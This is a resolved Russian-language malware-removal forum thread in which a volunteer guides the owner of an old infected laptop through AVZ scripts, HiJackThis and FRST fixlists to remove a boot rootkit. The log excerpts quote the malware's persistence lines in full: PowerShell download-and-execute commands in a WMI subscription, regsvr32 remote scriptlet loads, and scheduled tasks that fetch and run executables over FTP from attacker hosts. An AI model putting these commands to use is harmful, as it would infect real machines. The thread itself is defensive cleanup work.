[РЕШЕНО] Постоянные тормоза ноутбука [Rootkit.Boot.DarkGalaxy.a]

[Larisa46]

Дано - старинный ноутбук который серфил черт знает что в течение 3х лет.(пользовался пенсионер)
Жесткие тормоза, постоянные вылеты непонятных окон и так далее.

Логи ниже, буду рад помощи.

CollectionLog-2020.01.05-20.47.zip

[mike 1]

Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.

 

Если у вас похожая проблема - создайте тему в разделе Уничтожение вирусов и выполните Правила оформления запроса о помощи.

 

Здравствуйте! 

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

 

Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

 

begin

RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0);

 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');

 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32');

 DeleteSchedulerTask('Mysa');

 DeleteFile('c:\windows\update.exe>','64');

 DeleteSchedulerTask('Mysa1');

 DeleteSchedulerTask('Mysa2');

 DeleteSchedulerTask('Mysa3');

 DeleteSchedulerTask('ok');

 DeleteSchedulerTask('oka');

 DeleteFile('c:\windows\debug\item.dat','64');

 DeleteFile('c:\windows\debug\item.dat>','64');

 DeleteFile('c:\windows\help\lsmosee.exe>','64');

 DeleteFile('c:\windows\debug\ok.dat','64');

 DeleteFile('c:\windows\inf\aspnet\lsma12.exe','64');

ExecuteWizard('TSW',2,3,true);

ExecuteSysClean;

RebootWindows(true);

end.

 

Внимание! Будет выполнена перезагрузка компьютера. 

 

Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера).

 

O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"

 

Сделайте новые логи Автологгером. 

 

[Larisa46]

 

Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.

 

Если у вас похожая проблема - создайте тему в разделе Уничтожение вирусов и выполните Правила оформления запроса о помощи.

 

Здравствуйте! 

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

 

Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

 

begin
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0);
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32');
 DeleteSchedulerTask('Mysa');
 DeleteFile('c:\windows\update.exe>','64');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteFile('c:\windows\debug\item.dat','64');
 DeleteFile('c:\windows\debug\item.dat>','64');
 DeleteFile('c:\windows\help\lsmosee.exe>','64');
 DeleteFile('c:\windows\debug\ok.dat','64');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe','64');
ExecuteWizard('TSW',2,3,true);
ExecuteSysClean;
RebootWindows(true);
end.

 

Внимание! Будет выполнена перезагрузка компьютера. 

 

Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера).

 

O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"

 

Сделайте новые логи Автологгером. 

 

Так же ноутбук не автозагружает антивирус eset.  После установки он просто висит в панели пуск и не запускается даже по клику. После выполнения скрипта так же периодически компьютер уходит в перезагрузку без каких либо ошибок.

CollectionLog-2020.01.05-23.10.zip

[mike 1]

Пофиксите следующие строчки в HiJackThis

 

O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll (HKLM) (2020/01/05)
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

 

Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

 

begin
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
ExecuteSysClean;
ExecuteWizard('TSW',2,2,true);
RebootWindows(true);
end.

 

Внимание! Будет выполнена перезагрузка компьютера. 

 

Скачайте Farbar Recovery Scan Tool  и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

• Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

• Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".

• Нажмите кнопку Scan.

• После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.

• Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

 

[Larisa46]

PS. Компьютер уходит в перезагрузку после установки антивируса. После перезагрузки следов антивируса нет. Как будто идёт откат на 10-15 минут... Вот так вот "интересно"

PS. Компьютер уходит в перезагрузку после установки антивируса. После перезагрузки следов антивируса нет. Как будто идёт откат на 10-15 минут... Вот так вот "интересно"

[mike 1]

С антивирусом потом разберемся. Выполняйте рекомендации из поста 4. 

[Larisa46]

С антивирусом потом разберемся. Выполняйте рекомендации из поста 4. 

Прикрепляю все необходимое

CollectionLog-2020.01.06-11.23.zip

Addition.txt

FRST.txt

[mike 1]

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

• Временно выгрузите антивирус, файрволл и прочее защитное ПО.
  

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  

CreateRestorePoint:

CloseProcesses:

HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION

FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

Task: {4E5BA01A-934F-4798-98A6-C0A3EB8AF188} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION

Task: {5F519660-63F1-4E10-A9BA-D010C83FAEA0} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION

Task: {8F4E2712-B7A0-43F5-91CC-8606065C577A} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION

Task: {91F71B01-BAE4-48BE-B395-859065C0D04A} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe

Task: {DB4EEAC8-A4E6-4D91-B0CA-581FDCC186F3} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION

Task: {DEF324ED-E9C9-4958-985D-59F474BCFA0B} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e7acac32-5a1a-4d10-abc6-11654cb21a41} <==== ATTENTION (Restriction - IP)

2020-01-06 10:54 - 2020-01-06 10:54 - 000003170 _____ C:\Windows\system32\Tasks\oka

2020-01-06 10:53 - 2020-01-06 10:54 - 000003520 _____ C:\Windows\system32\Tasks\Mysa

2020-01-06 10:53 - 2020-01-06 10:54 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3

2020-01-06 10:53 - 2020-01-06 10:54 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2

2020-01-06 10:53 - 2020-01-06 10:54 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1

2020-01-06 10:53 - 2020-01-06 10:54 - 000003186 _____ C:\Windows\system32\Tasks\ok

2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n1.dat

2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n.dat

2020-01-06 10:41 - 2019-03-04 20:45 - 000000081 _____ C:\Windows\system32\s

2020-01-06 10:41 - 2019-03-04 20:45 - 000000079 _____ C:\Windows\system32\ps

2020-01-06 10:41 - 2019-03-04 20:45 - 000000077 _____ C:\Windows\system32\p

2019-03-04 18:55 - 2019-10-19 19:39 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat

2018-07-20 22:01 - 2018-07-20 22:01 - 000004096 ____H () C:\Users\Samsung\AppData\Local\keyfile3.drm

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION

WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION

WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]

WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION

WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]

• Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  

• Обратите внимание, что компьютер будет перезагружен.
  

• Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
  

 

 

Сделайте новые логи FRST. 

[Larisa46]

 

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

• Временно выгрузите антивирус, файрволл и прочее защитное ПО.

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {4E5BA01A-934F-4798-98A6-C0A3EB8AF188} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {5F519660-63F1-4E10-A9BA-D010C83FAEA0} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {8F4E2712-B7A0-43F5-91CC-8606065C577A} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {91F71B01-BAE4-48BE-B395-859065C0D04A} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe
Task: {DB4EEAC8-A4E6-4D91-B0CA-581FDCC186F3} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {DEF324ED-E9C9-4958-985D-59F474BCFA0B} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e7acac32-5a1a-4d10-abc6-11654cb21a41} <==== ATTENTION (Restriction - IP)
2020-01-06 10:54 - 2020-01-06 10:54 - 000003170 _____ C:\Windows\system32\Tasks\oka
2020-01-06 10:53 - 2020-01-06 10:54 - 000003520 _____ C:\Windows\system32\Tasks\Mysa
2020-01-06 10:53 - 2020-01-06 10:54 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3
2020-01-06 10:53 - 2020-01-06 10:54 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2
2020-01-06 10:53 - 2020-01-06 10:54 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
2020-01-06 10:53 - 2020-01-06 10:54 - 000003186 _____ C:\Windows\system32\Tasks\ok
2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n1.dat
2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n.dat
2020-01-06 10:41 - 2019-03-04 20:45 - 000000081 _____ C:\Windows\system32\s
2020-01-06 10:41 - 2019-03-04 20:45 - 000000079 _____ C:\Windows\system32\ps
2020-01-06 10:41 - 2019-03-04 20:45 - 000000077 _____ C:\Windows\system32\p
2019-03-04 18:55 - 2019-10-19 19:39 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2018-07-20 22:01 - 2018-07-20 22:01 - 000004096 ____H () C:\Users\Samsung\AppData\Local\keyfile3.drm
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]

• Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

• Обратите внимание, что компьютер будет перезагружен.

• Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

Сделайте новые логи FRST. 

 

FRST.txt

Addition.txt

Fixlog.txt

[mike 1]

1. Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;

Запустите файл TDSSKiller.exe.

Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.

В процессе проверки могут быть обнаружены объекты двух типов:

вредоносные (точно было установлено, какой вредоносной программой поражен объект);

подозрительные (тип вредоносного воздействия точно установить невозможно).

[*]По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.

[*]Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.

[*]Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).

[*]Самостоятельно без указания консультанта ничего не удаляйте!!!

[*]После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.

[*]Прикрепите лог утилиты к своему следующему сообщению

По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).

Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt

Например, C:\TDSSKiller.2.4.7_23.07.2010_15.31.43_log.txt

[Larisa46]

 

• Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;

• Запустите файл TDSSKiller.exe.

• Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.

• В процессе проверки могут быть обнаружены объекты двух типов:
  •  

• вредоносные (точно было установлено, какой вредоносной программой поражен объект);

• подозрительные (тип вредоносного воздействия точно установить невозможно).

• По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.

• Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.

• Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).

• Самостоятельно без указания консультанта ничего не удаляйте!!!

• После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.

• Прикрепите лог утилиты к своему следующему сообщению
• По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).

Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt

Например, C:\TDSSKiller.2.4.7_23.07.2010_15.31.43_log.txt

 

Два лога, после первой проверки и после перезагрузки

TDSSKiller.3.1.0.28_06.01.2020_20.46.47_log.txt

TDSSKiller.3.1.0.28_06.01.2020_20.49.34_log.txt

[mike 1]

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

• Временно выгрузите антивирус, файрволл и прочее защитное ПО
  

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  

CreateRestorePoint:

CloseProcesses:

HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION

HKU\S-1-5-21-3989281321-2876134707-2914065694-1000\...\MountPoints2: {f81134cf-bd50-11e7-9000-806e6f6e6963} - E:\wpi\MInst.exe

Task: {033BE705-E2E4-4C7B-89AD-6DD61789B501} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION

Task: {10886A58-E130-49F1-89F3-85AA7CAA6CBD} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION

Task: {72F83CA1-2DA5-4AEE-B874-E36A46146CB2} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION

Task: {B0DA8B18-0966-441C-A91C-5E5431CEA4CA} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION

Task: {B3452BF4-16AA-429B-9648-A8476C911274} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d898aa95-b9f9-4764-a724-f740df323b8b} <==== ATTENTION (Restriction - IP)

2020-01-06 18:47 - 2020-01-06 18:47 - 000003170 _____ C:\Windows\system32\Tasks\oka

2020-01-06 18:44 - 2020-01-06 18:47 - 000003520 _____ C:\Windows\system32\Tasks\Mysa

2020-01-06 18:44 - 2020-01-06 18:47 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3

2020-01-06 18:44 - 2020-01-06 18:47 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2

2020-01-06 18:44 - 2020-01-06 18:47 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1

2020-01-06 18:44 - 2020-01-06 18:47 - 000003186 _____ C:\Windows\system32\Tasks\ok

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION

WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION

WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION

• Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  

• Обратите внимание, что компьютер будет перезагружен.
  

• Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
  

 

 

Сделайте новые логи FRST.

[Larisa46]

 

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

• Временно выгрузите антивирус, файрволл и прочее защитное ПО

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
HKU\S-1-5-21-3989281321-2876134707-2914065694-1000\...\MountPoints2: {f81134cf-bd50-11e7-9000-806e6f6e6963} - E:\wpi\MInst.exe
Task: {033BE705-E2E4-4C7B-89AD-6DD61789B501} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {10886A58-E130-49F1-89F3-85AA7CAA6CBD} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {72F83CA1-2DA5-4AEE-B874-E36A46146CB2} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {B0DA8B18-0966-441C-A91C-5E5431CEA4CA} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {B3452BF4-16AA-429B-9648-A8476C911274} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d898aa95-b9f9-4764-a724-f740df323b8b} <==== ATTENTION (Restriction - IP)
2020-01-06 18:47 - 2020-01-06 18:47 - 000003170 _____ C:\Windows\system32\Tasks\oka
2020-01-06 18:44 - 2020-01-06 18:47 - 000003520 _____ C:\Windows\system32\Tasks\Mysa
2020-01-06 18:44 - 2020-01-06 18:47 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3
2020-01-06 18:44 - 2020-01-06 18:47 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2
2020-01-06 18:44 - 2020-01-06 18:47 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
2020-01-06 18:44 - 2020-01-06 18:47 - 000003186 _____ C:\Windows\system32\Tasks\ok
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
